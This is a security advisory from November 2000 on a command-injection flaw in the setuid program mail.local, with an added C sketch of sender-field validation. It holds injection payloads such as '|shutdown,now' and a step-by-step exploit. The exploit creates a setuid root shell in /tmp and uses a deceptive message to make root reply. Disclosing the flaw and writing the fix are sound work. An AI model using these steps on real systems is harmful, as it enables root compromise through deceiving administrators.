
Title: vulnerability in mail.local
Released by: Gregory Duchemin
Date: 1st November 2000

mail.local is a small setuid root program designed, as its name suggests, for local mail delivery.

Used with the -l option, it provides an interactive mode that speaks the LMTP protocol (a simplified SMTP for local mail delivery only).

A weakness exists in the 'mail from' field that allows any local user to insert a piped shell command that may be executed by the recipient when he replies with the mail command. A little social engineering skill should help to root the box.

Finally, mail.local shouldn't allow such escape characters, even in the mail from field, and the mail command shouldn't allow such a reply through a pipe.

A space character in the command will terminate the string, so either you use a single command like '|reboot' or you use a comma, which should be converted to a space by mail.

e.g.: '|shutdown,now'
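The input check the advisory asks for, sketched in C as an added example (not code from mail.local or from the advisory's author). The function name sender_is_safe, the length limit and the allow-list of characters are assumptions; the check refuses the '|' prefix, '/' paths and the comma that mail converts to a space.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: decide whether the address taken from
 * MAIL FROM:<...> may be stored as the message sender.
 * Returns 1 to accept, 0 to refuse the command. */
int sender_is_safe(const char *addr)
{
    size_t len = strlen(addr);
    const char *at;

    if (len == 0)                    /* "<>", the null sender used by bounces */
        return 1;
    if (len > 256 || addr[0] == '-') /* oversized, or option-like for a mail client */
        return 0;
    /* Allow-list (an assumption): letters, digits and a few punctuation
     * marks. Everything else is refused, which covers '|' (pipe to a
     * command), '/' (paths), ',' (turned into a space by mail) and spaces. */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!isalnum(c) && strchr("@._+=-", c) == NULL)
            return 0;
    }
    /* At most one '@', and never as the first or last character. */
    at = strchr(addr, '@');
    if (at != NULL && (at == addr || at[1] == '\0' || strchr(at + 1, '@') != NULL))
        return 0;
    return 1;
}

int main(void)
{
    /* Constructed samples; the last three use the forms shown in the advisory. */
    const char *samples[] = { "", "alice", "alice@example.org",
                              "|reboot", "|shutdown,now", "|/tmp/@hotmail.com" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s %s\n", samples[i][0] ? samples[i] : "<>",
               sender_is_safe(samples[i]) ? "accept" : "reject");
    return 0;
}
```

An allow-list is used instead of a list of forbidden characters so that a metacharacter nobody thought of is refused by default.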

Linux 2.4.0 beta Caldera, which was freely distributed during defcon 00, is vulnerable to this problem.

This looks like the old sendmail bugs.



#cat exploit
cp /bin/sh /tmp/newsh
chmod a+rws /tmp/newsh

#id=666(c3rb3r) gid=100(user)

#cp exploit /tmp/@hotmail.com
#chmod a+x /tmp/@hotmail.com
#mail.local -l

mail from:<|/tmp/@hotmail.com>      U can use many senders to hide the evil

rcpt to:

Subject:I have a problem

I need higher priviledge on this machine, can u do something for me please ?

(now wait for a reply and then, )

#ls /tmp

#id=0(root) gid=0(root)

#echo 'very nice, thanx a lot'  | mail -s 'thanx' root    // With


Have a nice day,

Gregory Duchemin
Security consultant
1001 bd Maisonneuve Ouest, suite 200
Montreal (Quebec) H3A 3C8 CANADA


